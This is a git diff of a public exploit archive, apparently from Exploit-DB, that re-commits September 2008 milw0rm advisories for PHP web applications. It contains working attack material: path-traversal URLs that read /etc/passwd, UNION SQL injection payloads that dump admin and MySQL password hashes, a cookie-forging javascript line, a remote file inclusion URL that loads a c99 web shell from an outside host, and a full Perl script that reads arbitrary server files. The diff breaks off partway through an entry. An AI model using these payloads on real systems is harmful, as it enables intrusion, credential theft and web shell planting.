'[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ########################################################################## + # [ lansuite <= 3.4 beta r1363 ] Local File Inclusion Vulnerability # + ########################################################################## + # + # Script: "Lansuite - Webbased LAN-Party Management System" + # + # Script site: http://lansuite.orgapage.de + # Download: http://sourceforge.net/project/showfiles.php?group_id=105885 + # + # Vuln: + # http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00 + # + # + # Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254) + # + # ... + # if (!$auth["design"]) $auth["design"] = "simple"; + # if (!file_exists("design/{$auth["design"]}/templates/index.php")) $auth["design"] = "simple"; + # $_SESSION["auth"]["design"] = $auth["design"]; + # if ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design']; // [1] + # + # // Statistic Functions (for generating server- and usage-statistics) + # if ($db->success) $stats = new stats(); + # + # // Boxes + # if (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once("modules/boxes/class_boxes.php"); + # + # if ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); // [2] LFI + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-25] diff --git a/platforms/php/webapps/6563.txt b/platforms/php/webapps/6563.txt index 46ca5f4e6..079624c52 100755 --- a/platforms/php/webapps/6563.txt +++ b/platforms/php/webapps/6563.txt 
@@ -1,58 +1,57 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################### - # [ phpOCS <= 0.1-beta3 ] Local File Inclusion Vulnerability # - ################################################################### - # - # Script: "phpOCS is a fully featured Online Community System. It has fully customisable message boards, calendars, galleries and articles." - # - # Script site: http://phpocs.sourceforge.net/ - # Download: http://sourceforge.net/projects/phpocs/ - # - # Vuln: - # http://site.com/[phpocs-0.1-beta3]/index.php?act=../../../../../../../etc/passwd%00 - # - # - # Bug: ./phpocs-0.1-beta3/index.php (lines: 7 and 9) - # - # ... - # 7: include("library/include.inc.php"); // (1); - # 9: makepage(); // (2); - # ... - # - # - # Bug: ./phpocs-0.1-beta3/library/pagefunctions.inc.php (lines: 3-104) - # - # ... - # 3: function makepage() { - # ... // (lines: 72-79) - # if (isset($_GET['act'])) - # { - # include("library/{$_GET['act']}.php"); // (3) LFI - # } - # else - # { - # include("library/home.php"); - # } - # ... - # 104: } - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-25] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. 
'[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################### + # [ phpOCS <= 0.1-beta3 ] Local File Inclusion Vulnerability # + ################################################################### + # + # Script: "phpOCS is a fully featured Online Community System. It has fully customisable message boards, calendars, galleries and articles." + # + # Script site: http://phpocs.sourceforge.net/ + # Download: http://sourceforge.net/projects/phpocs/ + # + # Vuln: + # http://site.com/[phpocs-0.1-beta3]/index.php?act=../../../../../../../etc/passwd%00 + # + # + # Bug: ./phpocs-0.1-beta3/index.php (lines: 7 and 9) + # + # ... + # 7: include("library/include.inc.php"); // (1); + # 9: makepage(); // (2); + # ... + # + # + # Bug: ./phpocs-0.1-beta3/library/pagefunctions.inc.php (lines: 3-104) + # + # ... + # 3: function makepage() { + # ... // (lines: 72-79) + # if (isset($_GET['act'])) + # { + # include("library/{$_GET['act']}.php"); // (3) LFI + # } + # else + # { + # include("library/home.php"); + # } + # ... + # 104: } + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-25] diff --git a/platforms/php/webapps/6564.txt b/platforms/php/webapps/6564.txt index a6317c394..37ff9a2f5 100755 --- a/platforms/php/webapps/6564.txt +++ b/platforms/php/webapps/6564.txt 
@@ -1,61 +1,60 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ####################################################################### - # [ Vikingboard <= 0.2 Beta ] Local File Inclusion Vulnerability # - ####################################################################### - # - # Script: "Vikingboard is a PHP-based discussion forum..." - # - # Script site: http://vikingboard.com/ - # Download: http://sourceforge.net/projects/vboard/ - # - # Vuln: - # http://site.com/[Vikingboard_0.2_Beta]/upload/index.php?act=task&task=./../../../../../../../etc/passwd%00 - # - # - # Bug: ./Vikingboard_0.2_Beta/upload/index.php (lines: 81-91) - # - # ... - # 81: switch(ifsetor($_GET['act'], false)) - # 82: { - # ... - # 88: case 'task': - # 89: require('./inc/lib/task_loader.php'); // (1) - # 90: load_task(); // (2) - # 91: break; - # ... - # - # - # Bug: ./Vikingboard_0.2_Beta/upload/inc/lib/task_loader.php (lines: 19-44) - # - # ... - # 19: function load_task() - # 20: { - # ... - # 27: if (!include("inc/tasks/task_{$_GET['task']}.php")) // (3) LFI - # 28: { - # 29: // Stop the script if the task does not exist - # 30: die(); - # 31: } - # .... - # 44: } - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-25] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. 
'[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ####################################################################### + # [ Vikingboard <= 0.2 Beta ] Local File Inclusion Vulnerability # + ####################################################################### + # + # Script: "Vikingboard is a PHP-based discussion forum..." + # + # Script site: http://vikingboard.com/ + # Download: http://sourceforge.net/projects/vboard/ + # + # Vuln: + # http://site.com/[Vikingboard_0.2_Beta]/upload/index.php?act=task&task=./../../../../../../../etc/passwd%00 + # + # + # Bug: ./Vikingboard_0.2_Beta/upload/index.php (lines: 81-91) + # + # ... + # 81: switch(ifsetor($_GET['act'], false)) + # 82: { + # ... + # 88: case 'task': + # 89: require('./inc/lib/task_loader.php'); // (1) + # 90: load_task(); // (2) + # 91: break; + # ... + # + # + # Bug: ./Vikingboard_0.2_Beta/upload/inc/lib/task_loader.php (lines: 19-44) + # + # ... + # 19: function load_task() + # 20: { + # ... + # 27: if (!include("inc/tasks/task_{$_GET['task']}.php")) // (3) LFI + # 28: { + # 29: // Stop the script if the task does not exist + # 30: die(); + # 31: } + # .... + # 44: } + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-25] diff --git a/platforms/php/webapps/6566.txt b/platforms/php/webapps/6566.txt index 3ccdd600c..08807d93a 100755 --- a/platforms/php/webapps/6566.txt +++ b/platforms/php/webapps/6566.txt 
@@ -1,57 +1,57 @@ -========================================================== - PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities -========================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -AUTHOR : CWH Underground -DATE : 25 September 2008 -SITE : cwh.citec.us - - -##################################################### -APPLICATION : PHP infoBoard V.7 Plus -VERSION : v.7 -VENDOR : http://cannot.info/phpinfoboard -DOWNLOAD : http://cannot.info/lib/dw/plus7.zip -##################################################### - --- Remote SQL Injection --- - -[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_admin--&showpage=10 -[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_user--&showpage=10 - -Note: [prefix] is a prefix of table names that an administrator assigns it when he sets up PHP infoBoard. - - --- Strore XSS -- - -At page http://[Target]/[path]/?action=newtopic&idcat=[number] - -This page is used to add new topics and there is a feild "ª×èÍ" which is prepared for inserting poster's name. -We can inject javascript into this feild as result in "Stored XSS". - -Example code of vulnerable input feild: -ª×èÍ - -Note: -- [number] is a idcat that an administrator assigns it (default is 1). -- We can inject javascript into the feild when we do not log in to be a user of a PHP infoBoard. 
- - -##################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2008-09-25] +========================================================== + PHP infoBoard V.7 Plus Multiple Remote Vulnerabilities +========================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +AUTHOR : CWH Underground +DATE : 25 September 2008 +SITE : cwh.citec.us + + +##################################################### +APPLICATION : PHP infoBoard V.7 Plus +VERSION : v.7 +VENDOR : http://cannot.info/phpinfoboard +DOWNLOAD : http://cannot.info/lib/dw/plus7.zip +##################################################### + +-- Remote SQL Injection --- + +[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_admin--&showpage=10 +[+]http://[Target]/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_user--&showpage=10 + +Note: [prefix] is a prefix of table names that an administrator assigns it when he sets up PHP infoBoard. + + +-- Strore XSS -- + +At page http://[Target]/[path]/?action=newtopic&idcat=[number] + +This page is used to add new topics and there is a feild "ª×èÍ" which is prepared for inserting poster's name. +We can inject javascript into this feild as result in "Stored XSS". 
+ +Example code of vulnerable input feild: +ª×èÍ + +Note: +- [number] is a idcat that an administrator assigns it (default is 1). +- We can inject javascript into the feild when we do not log in to be a user of a PHP infoBoard. + + +##################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2008-09-25] diff --git a/platforms/php/webapps/6567.pl b/platforms/php/webapps/6567.pl index 7edb122dc..47e44166d 100755 --- a/platforms/php/webapps/6567.pl +++ b/platforms/php/webapps/6567.pl 
@@ -1,95 +1,95 @@ -#! /usr/bin/perl - -# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability -# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -# Program: Libra PHP File Manager -# Version: <= 1.18 , 2.0 -# File affected: fileadmin.php -# Download: http://file.sourceforge.net -# -# -# Found by Pepelux -# eNYe-Sec - www.enye-sec.org -# Greetings to Ka0x for help me with the perl code :) -# -# You can scale directories and read any file that you have permissions - -use LWP::UserAgent; -$ua = LWP::UserAgent->new; - -print "\e[2J"; -system(($^O eq 'MSWin32') ? 'cls' : 'clear'); - -my ($host, $path, $action) = @ARGV ; - -unless($ARGV[2]) { - print "Usage: perl $0 \n"; - print "\tex: perl $0 http://site.com /etc/ list\n"; - print "\tex: perl $0 http://site.com /etc/passwd edit\n"; - print "Actions:\n"; - print " list:\n"; - print " edit:\n\n"; - exit 1; -} - -$ua->agent("$0/0.1 " . $ua->agent); -$host = "http://".$host if ($host !~ /^http:/); -$path = $path."/" if ($action eq "list" && $path !~ /\/$/); -$op = "home" if ($action == "list"); - -if ($action eq "edit") { - $aux = $path; - $directory = ""; - - do { - $x = index($aux, "/"); - $y = length($aux) - $x; - $directory .= substr($aux, 0, $x+1); - $aux = substr($aux, $x+1, $y); - } until ($x == -1); - - $path = $directory; - $file = $aux; - $op = "edit"; -} - -$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path; -$url .= "&fename=".$file if ($action eq "edit"); - -$req = HTTP::Request->new(GET => $url); -$req->header('Accept' => 'text/html'); - -$res = $ua->request($req); - -if ($res->is_success) { - $result = $res->content; - - if ($action eq "edit") { - print "Viewing $path$file:\n"; - print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s); - } - else { - print "Files in $path:\n"; - $x = index($result, "Files:") + 6; - $result = substr($result, $x, length($result)-$x); - 
$result =~ s/<[^>]*>//g; - $result =~ s/Filename//g; - $result =~ s/Size//g; - $result =~ s/Edit//g; - $result =~ s/Rename//g; - $result =~ s/Delete//g; - $result =~ s/Move//g; - $result =~ s/View//g; - $result =~ s/Open//g; - $result =~ s/\d*//g; - $result =~ s/\s+/\n/g; - $x = index($result, "Copyright"); - $result = substr($result, 0, $x); - print $result; - } -} -else { print "Error: " . $res->status_line . "\n";} - -# milw0rm.com [2008-09-25] +#! /usr/bin/perl + +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +# Program: Libra PHP File Manager +# Version: <= 1.18 , 2.0 +# File affected: fileadmin.php +# Download: http://file.sourceforge.net +# +# +# Found by Pepelux +# eNYe-Sec - www.enye-sec.org +# Greetings to Ka0x for help me with the perl code :) +# +# You can scale directories and read any file that you have permissions + +use LWP::UserAgent; +$ua = LWP::UserAgent->new; + +print "\e[2J"; +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); + +my ($host, $path, $action) = @ARGV ; + +unless($ARGV[2]) { + print "Usage: perl $0 \n"; + print "\tex: perl $0 http://site.com /etc/ list\n"; + print "\tex: perl $0 http://site.com /etc/passwd edit\n"; + print "Actions:\n"; + print " list:\n"; + print " edit:\n\n"; + exit 1; +} + +$ua->agent("$0/0.1 " . 
$ua->agent); +$host = "http://".$host if ($host !~ /^http:/); +$path = $path."/" if ($action eq "list" && $path !~ /\/$/); +$op = "home" if ($action == "list"); + +if ($action eq "edit") { + $aux = $path; + $directory = ""; + + do { + $x = index($aux, "/"); + $y = length($aux) - $x; + $directory .= substr($aux, 0, $x+1); + $aux = substr($aux, $x+1, $y); + } until ($x == -1); + + $path = $directory; + $file = $aux; + $op = "edit"; +} + +$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path; +$url .= "&fename=".$file if ($action eq "edit"); + +$req = HTTP::Request->new(GET => $url); +$req->header('Accept' => 'text/html'); + +$res = $ua->request($req); + +if ($res->is_success) { + $result = $res->content; + + if ($action eq "edit") { + print "Viewing $path$file:\n"; + print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s); + } + else { + print "Files in $path:\n"; + $x = index($result, "Files:") + 6; + $result = substr($result, $x, length($result)-$x); + $result =~ s/<[^>]*>//g; + $result =~ s/Filename//g; + $result =~ s/Size//g; + $result =~ s/Edit//g; + $result =~ s/Rename//g; + $result =~ s/Delete//g; + $result =~ s/Move//g; + $result =~ s/View//g; + $result =~ s/Open//g; + $result =~ s/\d*//g; + $result =~ s/\s+/\n/g; + $x = index($result, "Copyright"); + $result = substr($result, 0, $x); + print $result; + } +} +else { print "Error: " . $res->status_line . "\n";} + +# milw0rm.com [2008-09-25] diff --git a/platforms/php/webapps/6568.txt b/platforms/php/webapps/6568.txt index f8510c39b..bb0a4f029 100755 --- a/platforms/php/webapps/6568.txt +++ b/platforms/php/webapps/6568.txt 
@@ -1,11 +1,11 @@
-###############################################################################################
-[+] PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack
-[+] Greetz : All my freind
-################################################################################################
----
-exploit:
-
-javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";
-
-# milw0rm.com [2008-09-25]
+###############################################################################################
+[+] PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack
+[+] Greetz : All my freind
+################################################################################################
+---
+exploit:
+
+javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6569.txt b/platforms/php/webapps/6569.txt
index 15e6b65f4..603ed3d37 100755
--- a/platforms/php/webapps/6569.txt
+++ b/platforms/php/webapps/6569.txt
@@ -1,21 +1,21 @@
----------------------------------------------------------------------
- Vikingboard <= 0.2 Beta SQL Column Truncation
----------------------------------------------------------------------
- Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
- Discovered On: 25/09/2008
----------------------------------------------------------------------
- You Can Register An User\Admin That Already Exists!
----------------------------------------------------------------------
- URL: upload/register.php
-
- Username: [username] NULL
- Password: [password]
- E-Mail: [E-Mail]
----------------------------------------------------------------------
- URL: upload/login.php
-
- Username: [username]
- Password: [password]
----------------------------------------------------------------------
-
-# milw0rm.com [2008-09-25]
+---------------------------------------------------------------------
+ Vikingboard <= 0.2 Beta SQL Column Truncation
+---------------------------------------------------------------------
+ Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
+ Discovered On: 25/09/2008
+---------------------------------------------------------------------
+ You Can Register An User\Admin That Already Exists!
+---------------------------------------------------------------------
+ URL: upload/register.php
+
+ Username: [username] NULL
+ Password: [password]
+ E-Mail: [E-Mail]
+---------------------------------------------------------------------
+ URL: upload/login.php
+
+ Username: [username]
+ Password: [password]
+---------------------------------------------------------------------
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6571.txt b/platforms/php/webapps/6571.txt
index ef594358d..b62a78ee4 100755
--- a/platforms/php/webapps/6571.txt
+++ b/platforms/php/webapps/6571.txt
@@ -1,38 +1,37 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ######################################################################## - # [ openEngine <= 2.0 beta4 ] Remote File Inclusion Vulnerability # - ######################################################################## - # - # Script: "Open Source Web Content Management Systems openEngine" - # - # Script site: http://www.openengine.de/ - # Download: http://sourceforge.net/projects/openengine/ - # - # Vuln: http://site.com/[openengine20]/cms/system/openengine.php?oe_classpath=[spread???] - # - # - # Bug: ./openengine20/cms/system/openengine.php - # - # ... - # require($oe_classpath."/openengine/database/mysql.php"); - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-25] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ######################################################################## + # [ openEngine <= 2.0 beta4 ] Remote File Inclusion Vulnerability # + ######################################################################## + # + # Script: "Open Source Web Content Management Systems openEngine" + # + # Script site: http://www.openengine.de/ + # Download: http://sourceforge.net/projects/openengine/ + # + # Vuln: http://site.com/[openengine20]/cms/system/openengine.php?oe_classpath=[spread???] + # + # + # Bug: ./openengine20/cms/system/openengine.php + # + # ... 
+ # require($oe_classpath."/openengine/database/mysql.php"); + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-25] diff --git a/platforms/php/webapps/6575.txt b/platforms/php/webapps/6575.txt index 7e05cdcfc..f9f8452b7 100755 --- a/platforms/php/webapps/6575.txt +++ b/platforms/php/webapps/6575.txt 
@@ -1,29 +1,29 @@ -# Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability - -# Download From : http://www.barcodephp.com/processdownload.php?id=barcodegen.1d-php4.v2.0.0.zip - -# Found By : Br0k3n H34rT - -# Home Page : WwW.Sec-Code.CoM - -============================================================================ - -# Vulne Code : In File : LSTable.php In Line 21 : - -include( $class_dir.'/Table_template.php' ); - -# Exploit : - -http://WwW.Sec-Code.CoM/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://SITE.COM/shell/c99.txt? - -============================================================================ - -# Greet To : - -My Master RoMaNcYxHaCkEr , And All My Members - -# Note : Eid Mobarak :) - -# bEST wISHES - -# milw0rm.com [2008-09-26] +# Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability + +# Download From : http://www.barcodephp.com/processdownload.php?id=barcodegen.1d-php4.v2.0.0.zip + +# Found By : Br0k3n H34rT + +# Home Page : WwW.Sec-Code.CoM + +============================================================================ + +# Vulne Code : In File : LSTable.php In Line 21 : + +include( $class_dir.'/Table_template.php' ); + +# Exploit : + +http://WwW.Sec-Code.CoM/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://SITE.COM/shell/c99.txt? + +============================================================================ + +# Greet To : + +My Master RoMaNcYxHaCkEr , And All My Members + +# Note : Eid Mobarak :) + +# bEST wISHES + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6576.txt b/platforms/php/webapps/6576.txt index f54736c5f..7f82c3bb6 100755 --- a/platforms/php/webapps/6576.txt +++ b/platforms/php/webapps/6576.txt 
@@ -1,57 +1,57 @@ -================================================================================ - Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability -================================================================================ - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -AUTHOR : CWH Underground -DATE : 26 September 2008 -SITE : cwh.citec.us - - -##################################################### -APPLICATION : Ultimate Webboard -VERSION : 3.00 -DOWNLOAD : http://php.deeserver.net/download/get/79/webboard3.0.0.zip -##################################################### - ---- Remote SQL Injection --- - -** Magic Quote must turn off ** - ------------------------------------ - Vulnerable File (webboard.php) ------------------------------------ - -$sql="select * from board_data where Category='$Category' order by No DESC"; - ---------- - Exploit ---------- - -[+] http://[Target]/[webboard]/webboard.php?Category=[Category'name][SQL Injection] - - ------- - POC ------- - -[+] http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root - - -##################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2008-09-26] +================================================================================ + Ultimate Webboard (webboard.php Category) Remote SQL Injection Vulnerability +================================================================================ + + 
,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +AUTHOR : CWH Underground +DATE : 26 September 2008 +SITE : cwh.citec.us + + +##################################################### +APPLICATION : Ultimate Webboard +VERSION : 3.00 +DOWNLOAD : http://php.deeserver.net/download/get/79/webboard3.0.0.zip +##################################################### + +--- Remote SQL Injection --- + +** Magic Quote must turn off ** + +----------------------------------- + Vulnerable File (webboard.php) +----------------------------------- + +$sql="select * from board_data where Category='$Category' order by No DESC"; + +--------- + Exploit +--------- + +[+] http://[Target]/[webboard]/webboard.php?Category=[Category'name][SQL Injection] + + +------ + POC +------ + +[+] http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root + + +##################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6577.txt b/platforms/php/webapps/6577.txt index f6b7552ad..b8f16124d 100755 --- a/platforms/php/webapps/6577.txt +++ b/platforms/php/webapps/6577.txt 
@@ -1,60 +1,60 @@ -=================================================================== - PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability -=================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -AUTHOR : CWH Underground -DATE : 26 September 2008 -SITE : cwh.citec.us - - -##################################################### -APPLICATION : PromoteWeb MySQL -DOWNLOAD : http://php.deeserver.net/download/get/23/promote.zip -##################################################### - ---- Remote SQL Injection --- - -** Magic Quote must turn off ** - ------------------------------------ - Vulnerable File (go.php) ------------------------------------ - -$sql = "select * from promote where No='$id'"; - ---------- - Exploit ---------- - -[+] http://[Target]/[promote]/go.php?id=[SQL Injection] - - ------- - POC ------- - -[+] http://[Target]/[promote]/go.php?id=1'/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8/**/FROM/**/promote/**/WHERE/**/No='1 - - -Note!! Result of SQL Injection will appear new window with http://[result]/ -Example: http://5.0.51a/ - - -##################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2008-09-26] +=================================================================== + PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability +=================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +AUTHOR : CWH Underground +DATE : 26 September 2008 +SITE : cwh.citec.us + + +##################################################### +APPLICATION : PromoteWeb MySQL +DOWNLOAD : http://php.deeserver.net/download/get/23/promote.zip +##################################################### + +--- Remote SQL Injection --- + +** Magic Quote must turn off ** + +----------------------------------- + Vulnerable File (go.php) +----------------------------------- + +$sql = "select * from promote where No='$id'"; + +--------- + Exploit +--------- + +[+] http://[Target]/[promote]/go.php?id=[SQL Injection] + + +------ + POC +------ + +[+] http://[Target]/[promote]/go.php?id=1'/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8/**/FROM/**/promote/**/WHERE/**/No='1 + + +Note!! Result of SQL Injection will appear new window with http://[result]/ +Example: http://5.0.51a/ + + +##################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2008-09-26] diff --git a/platforms/php/webapps/6578.txt b/platforms/php/webapps/6578.txt index f4d8c8534..9bf6bee86 100755 --- a/platforms/php/webapps/6578.txt +++ b/platforms/php/webapps/6578.txt 
@@ -1,58 +1,58 @@ -=================================================================== - 212cafe Board (view.php qID) Remote SQL Injection Vulnerability -=================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -AUTHOR : CWH Underground -DATE : 26 September 2008 -SITE : cwh.citec.us - - -##################################################### -APPLICATION : 212cafe Board -VERSION : 0.07 -VENDOR : http://www.212cafe.com/ -DOWNLOAD : http://php.deeserver.net/download/get/12/212cafeboard_v0_07.zip -##################################################### - ---- Remote SQL Injection --- - -** Magic Quote must turn off ** - ------------------------------------ - Vulnerable File (view.php) ------------------------------------ - -$query="SELECT * FROM board_question WHERE (qID='$qID')"; - ---------- - Exploit ---------- - -[+] 